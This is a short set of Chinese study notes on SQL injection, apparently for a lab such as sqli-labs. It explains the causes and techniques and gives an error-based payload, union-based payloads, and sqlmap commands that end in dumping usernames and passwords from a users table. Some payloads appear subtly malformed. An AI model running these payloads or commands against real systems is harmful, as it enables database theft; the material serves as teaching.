一、造成SQL注入的原因
- 程序编写者在处理程序和数据库交互时,使用字符串拼接的方式构造SQL语句
- 为对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中
二、注入点可能存在的位置
- GET数据
- POST数据
- Cookie数据
- HTTP头部(HTTP请求报文其他字段)
三、SQL注入存在的危害
攻击者利用SQL注入漏洞,可以获取数据库中的多种信息(例如:管理员后台的密码),从而脱取数据库中的内容(俗称脱库)。
四、SQL注入四大基本手法
联合注入
报错注入
在注入点的判断过程中,发现数据库中SQL语句的报错信息,会显示在页面中,因此可以进行报错注入。
报错注入的原理,就是在错误信息中执行SQL语句。出发报错的方式有很多,具体细节也不尽相同。建议直接背公式即可,以下为group by重复建冲突公式。
group by重复建冲突
?id=33 and (select 1 from (select count(*),concat((select version() from information_schema.tables limit 0,1),floor(rand()*2)x from information_schema.tables group by x)a)
布尔盲注
延时注入
堆叠查询(多语句查询)
五、口诀
是否有回显? 联合查询
是否有报错? 报错注入
是否有布尔类型状态? 布尔盲注
绝招 延时注入
六、全自动化注入
6.1、半自动化注入工具burp
6.2、全自动化注入工具sqlmap(kali)
参数描述:
-u:检测注入点
--dbs:列出所有数据库的名字
--current-db:列出当前数据库的名字
-D:指定一个数据库名字
--tables:列出表名,结合-D使用
-T:指定表名称
--columns:列出所有的字段名,结合-T,-D使用
-C:指定字段
--dump:列出字段内容
示例:
命令:sqlmap -u "http://10.211.55.8/cms/show.php?id=33"
命令:sqlmap -u "http://10.211.55.8/cms/show.php?id=33" --dbs
命令:sqlmap -u "http://10.211.55.8/cms/show.php?id=33" -D "cms" --tables
命令:sqlmap -u "http://10.211.55.8/cms/show.php?id=33" -D "cms" -T "cms_users" --columns
命令:sqlmap -u "http://10.211.55.8/cms/show.php?id=33" -D "cms" -T "cms_users" -C "username, password" --dump
6.3、sqli-lib
6.3.1、字符型注入
单引号
?id=1
?id=1' and 1=2 union select 1, version(), 3 --+
6.3.2、数字型注入
?id=-2 union select 1,2 database()
6.3.3、字符型注入
')
?id=2') and 1=2 union select 1,2 version() --+